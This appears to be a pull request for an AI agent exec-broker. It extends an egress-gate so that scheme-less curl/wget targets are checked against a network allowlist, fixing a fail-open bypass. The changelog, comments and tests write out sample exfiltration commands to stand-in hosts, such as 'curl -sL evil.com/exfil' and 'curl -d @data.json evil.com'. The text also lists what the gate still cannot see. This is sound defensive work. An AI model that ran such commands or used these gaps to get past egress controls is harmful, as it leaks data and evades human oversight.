### PR TITLE
security(broker): egress-gate enforces scheme-less curl/wget targets

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -36,6 +36,18 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/).
 
 ### Security
 
+- **egress-gate now enforces scheme-less `curl`/`wget` targets.** Network-target extraction
+  parsed only explicit `http(s)://` URLs, so `curl evil.com`, `wget evil.com/x`, and
+  `curl -sL evil.com/exfil` — the most common egress forms — produced zero hosts and the signed
+  `[scope].egress` allowlist was **not enforced** for them (a fail-open the sweep flagged). A
+  second, still-conservative extraction pass now reads the positional argument of `curl`/`wget`
+  as a network target, skipping value-taking flags (`-o out.txt`, `-H`, `-d @data.json`, …) so
+  their arguments are never mistaken for hosts, and only accepting a strict dotted-domain shape
+  (zero false positives — `localhost`, bare words, and `-o`/`-d` values are not treated as
+  hosts). Implicit-registry tools (`git`/`npm`/`pip`), non-http schemes, and variable-expanded
+  URLs remain out of reach — command-string inspection is defense-in-depth, documented as such,
+  not a substitute for a network sandbox.
+
 - **exec-broker PreToolUse gates hardened to fail closed (three bypasses, found by an internal
   bug sweep).** The runtime enforcement point (`kit gate-fs` / `kit gate-egress`) and the CLI's
   gate dispatch had gaps where an attacker or an internal fault could slip past confinement:

--- a/src/broker/extract.test.ts
+++ b/src/broker/extract.test.ts
@@ -37,4 +37,46 @@ describe("extractHostsFromCommand", () => {
     const cmd = "curl https://x.io https://y.io";
     assert.deepEqual(extractHostsFromCommand(cmd), extractHostsFromCommand(cmd));
   });
+
+  // Pass 2: scheme-less hosts passed positionally to curl/wget (the common egress-gate bypass).
+  it("extracts a scheme-less host given positionally to curl/wget", () => {
+    assert.deepEqual(extractHostsFromCommand("curl evil.com"), ["evil.com"]);
+    assert.deepEqual(extractHostsFromCommand("wget evil.com/pkg.tgz"), ["evil.com"]);
+    assert.deepEqual(extractHostsFromCommand("curl -sL example.org/x"), ["example.org"]);
+    assert.deepEqual(extractHostsFromCommand("nc example.net 443"), []); // nc is not a fetch tool
+  });
+
+  it("finds the fetch tool even when it is not the first token", () => {
+    assert.deepEqual(extractHostsFromCommand("sudo curl evil.com"), ["evil.com"]);
+  });
+
+  it("does NOT mistake value-flag arguments for hosts (no false positives)", () => {
+    // -o's value is a filename that looks host-shaped; only the real target must be extracted.
+    assert.deepEqual(extractHostsFromCommand("curl -o out.html https://api.acme.com"), [
+      "api.acme.com",
+    ]);
+    assert.deepEqual(extractHostsFromCommand("curl -d @data.json evil.com"), ["evil.com"]);
+    assert.deepEqual(
+      extractHostsFromCommand(`curl -H "Accept: application/json" https://api.acme.com`),
+      ["api.acme.com"],
+    );
+    assert.deepEqual(extractHostsFromCommand("wget -P out.dir https://cdn.acme.io/p"), [
+      "cdn.acme.io",
+    ]);
+  });
+
+  it("does not bleed across shell separators (only curl/wget segments contribute)", () => {
+    // `rm b.com` must not yield a host — rm is not a fetch tool.
+    assert.deepEqual(extractHostsFromCommand("curl a.com && rm b.com"), ["a.com"]);
+    assert.deepEqual(extractHostsFromCommand("echo evil.com | curl good.com"), ["good.com"]);
+  });
+
+  it("ignores schemeless targets without a dotted domain (localhost, bare words)", () => {
+    assert.deepEqual(extractHostsFromCommand("curl localhost:3000/health"), []);
+    assert.deepEqual(extractHostsFromCommand("curl -X POST myservice/health"), []);
+  });
+
+  it("merges explicit-URL and scheme-less hosts, deduped and sorted", () => {
+    assert.deepEqual(extractHostsFromCommand("curl https://a.com b.com a.com"), ["a.com", "b.com"]);
+  });
 });

--- a/src/broker/extract.ts
+++ b/src/broker/extract.ts
@@ -2,17 +2,127 @@
  * kit exec-broker — conservative network-target extraction (Pillar 3 step 4).
  *
  * Design: `pillar3-exec-broker-5.0.md` §3.3 / §6.2 — the egress-gate inspects a pending Bash
- * command for its network targets. Extraction is deliberately CONSERVATIVE and unambiguous:
- * only explicit `http://` / `https://` URLs are parsed (via the WHATWG URL parser), because a
- * bare word like `api.acme.com` in a command is ambiguous (an argument? a filename?) and a
- * false "network target" would break legitimate work. A command that reaches the network
- * without an explicit URL is out of this extractor's reach — honest limitation, documented,
- * not papered over. Pure + deterministic: same command → same hosts (unique, sorted).
+ * command for its network targets. Two passes, both deliberately CONSERVATIVE (a false positive
+ * would wrongly deny legitimate work, so we only extract high-confidence targets):
+ *
+ *   1. Explicit `http(s)://` URLs, parsed via the WHATWG URL parser.
+ *   2. Scheme-less hosts passed as the POSITIONAL argument to a known fetch tool (`curl` /
+ *      `wget`) — e.g. `curl evil.com/exfil`, `wget evil.com`. curl/wget treat a bare positional
+ *      as a URL, so it IS a real network target; without this pass the egress allowlist was not
+ *      enforced for the most common egress form (a fail-open the bug sweep flagged). Value-taking
+ *      flags (`-o out.txt`, `-H`, `-d @data.json`, …) are skipped so their arguments are never
+ *      mistaken for hosts, and a token is only taken when it matches a strict domain shape.
+ *
+ * Still an HONEST LIMITATION, not a complete boundary: implicit-registry tools (`git`, `npm`,
+ * `pip`), non-http(s) schemes, and variable-expanded URLs (`curl $HOST`) remain out of reach —
+ * command-string inspection is defense-in-depth, pair it with a network sandbox for a hard
+ * boundary. Pure + deterministic: same command → same hosts (unique, sorted).
  */
 
 const URL_RE = /https?:\/\/[^\s"'`<>\\)\];]+/gi;
 
-/** Unique, sorted, lowercased hostnames of every explicit http(s) URL in a shell command. */
+/** Tools whose bare positional argument is a URL/host even without a scheme. Registry/implicit-
+ *  network tools (git/npm/pip/ssh/scp) are intentionally excluded — their targets are implicit
+ *  and treating a bare arg as a host would over-block. */
+const FETCH_TOOLS = new Set(["curl", "wget"]);
+
+/** curl/wget flags that CONSUME the next token as a NON-host value, so it is never read as a
+ *  network target (e.g. `curl -o out.txt host` must not extract `out.txt`). */
+const VALUE_FLAGS = new Set([
+  "-o",
+  "--output",
+  "-O",
+  "-T",
+  "--upload-file",
+  "-d",
+  "--data",
+  "--data-raw",
+  "--data-binary",
+  "--data-urlencode",
+  "-H",
+  "--header",
+  "-F",
+  "--form",
+  "-A",
+  "--user-agent",
+  "-e",
+  "--referer",
+  "-u",
+  "--user",
+  "-b",
+  "--cookie",
+  "-c",
+  "--cookie-jar",
+  "-w",
+  "--write-out",
+  "-E",
+  "--cert",
+  "--key",
+  "--cacert",
+  "-K",
+  "--config",
+  "-m",
+  "--max-time",
+  "--connect-timeout",
+  "--retry",
+  // wget
+  "-a",
+  "--append-output",
+  "-P",
+  "--directory-prefix",
+  "--output-document",
+  "--password",
+]);
+
+/** Strict domain shape: ≥2 dot-separated labels + an alpha TLD, optional :port and /path. A
+ *  scheme (`x://…`) never matches — those are handled by URL_RE. */
+const HOST_RE = /^(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z]{2,}(?::\d+)?(?:\/\S*)?$/i;
+
+/** basename of a command token (`/usr/bin/curl` → `curl`). */
+function basename(tok: string): string {
+  const i = tok.lastIndexOf("/");
+  return i === -1 ? tok : tok.slice(i + 1);
+}
+
+/** Normalize a bare host token to a lowercase hostname via the URL parser, or null. */
+function hostOf(token: string): string | null {
+  if (!HOST_RE.test(token)) return null;
+  try {
+    const h = new URL("http://" + token).hostname;
+    return h.length > 0 ? h.toLowerCase() : null;
+  } catch {
+    return null;
+  }
+}
+
+/** Scheme-less hosts that are positional args to a curl/wget in the command (pass 2). */
+function extractFetchHosts(command: string, hosts: Set<string>): void {
+  // Split into command segments on shell separators so `curl a.com;echo` doesn't bleed.
+  for (const segment of command.split(/&&|\|\||[;\n|&]/)) {
+    const tokens = segment.trim().split(/\s+/).filter(Boolean);
+    let inFetch = false;
+    let skipNext = false;
+    for (const tok of tokens) {
+      if (!inFetch) {
+        if (FETCH_TOOLS.has(basename(tok))) inFetch = true;
+        continue; // the tool token itself is never a host
+      }
+      if (skipNext) {
+        skipNext = false;
+        continue; // this is a value-flag's argument — not a host
+      }
+      if (tok.startsWith("-")) {
+        // `--flag=value` carries its value inline (one token) — nothing to skip after it.
+        if (VALUE_FLAGS.has(tok)) skipNext = true;
+        continue;
+      }
+      const h = hostOf(tok);
+      if (h) hosts.add(h);
+    }
+  }
+}
+
+/** Unique, sorted, lowercased hostnames of every network target in a shell command. */
 export function extractHostsFromCommand(command: string): string[] {
   const hosts = new Set<string>();
   for (const match of command.match(URL_RE) ?? []) {
@@ -23,5 +133,6 @@ export function extractHostsFromCommand(command: string): string[] {
       /* not a parseable URL after all — skip (conservative: never guess) */
     }
   }
+  extractFetchHosts(command, hosts);
   return [...hosts].sort();
 }

--- a/src/broker/gates.test.ts
+++ b/src/broker/gates.test.ts
@@ -90,6 +90,13 @@ describe("kit gate-egress (subprocess)", () => {
   it("fails open only on a non-command / unparseable envelope", () => {
     assert.equal(runGate("gate-egress", { tool_name: "Read", tool_input: {} }).status, 0);
   });
+
+  it("enforces scheme-less curl/wget targets (the common bypass): off-scope denied, in-scope allowed", () => {
+    const off = runGate("gate-egress", bash("curl evil.example.com/exfil"));
+    assert.equal(off.status, 2);
+    assert.match(off.stderr, /evil\.example\.com/);
+    assert.equal(runGate("gate-egress", bash("curl api.acme.com/v1")).status, 0);
+  });
 });
 
 describe("kit gate-fs (subprocess)", () => {


### PR DESCRIPTION
## What

The third enforcement-layer bypass from the internal bug sweep (completes the fail-open-gate triple; #365 fixed the first two).

`extractHostsFromCommand` parsed **only** explicit `http(s)://` URLs. So the most common egress forms —

```
curl evil.com          wget evil.com/x          curl -sL evil.com/exfil
```

— produced **zero hosts**, and the signed `[scope].egress` allowlist was **not enforced** for them. The egress-gate silently allowed them (fail-open).

## Fix

A second, still-conservative extraction pass reads the **positional argument** of `curl`/`wget` (tools that treat a bare arg as a URL) as a network target. Designed for **zero false positives**:

- **skips value-taking flags** and their arguments (`-o out.txt`, `-H`, `-d @data.json`, `-F`, `-T`, …) so a filename is never mistaken for a host;
- only accepts a **strict dotted-domain shape** (`localhost`, bare words, and flag values are not hosts);
- does **not** bleed across shell separators (`curl a.com && rm b.com` → only `a.com`);
- normalizes via the URL parser (port/auth/path stripped), deduped + sorted, merged with the explicit-URL pass.

Localized to `src/broker/extract.ts` — the egress-gate already calls it.

## Honest limitation (documented, unchanged philosophy)

Implicit-registry tools (`git`/`npm`/`pip`), non-http(s) schemes, and variable-expanded URLs (`curl $HOST`) remain out of reach. Command-string inspection is **defense-in-depth**, not a complete boundary — pair it with a network sandbox for a hard guarantee. This PR strictly *broadens* coverage of the common case without introducing false denials.

## Tests

- `src/broker/extract.test.ts` — scheme-less extraction (`curl evil.com`, `wget evil.com/x`, tool-not-first); **false-positive guards** (`-o out.txt` / `-d @data.json` / `-H` values not treated as hosts, `localhost` and bare words ignored); segment isolation; dedup with explicit URLs. The existing conservative cases (`ping`, `git ssh://`, `npm`) still yield `[]`.
- `src/broker/gates.test.ts` — end-to-end at the gate: off-scope `curl evil.example.com/exfil` now **denies (exit 2)**; in-scope `curl api.acme.com/v1` allows.
- Full suite green (**2999 pass / 0 fail**).

🤖 Generated with [Claude Code](https://claude.com/claude-code)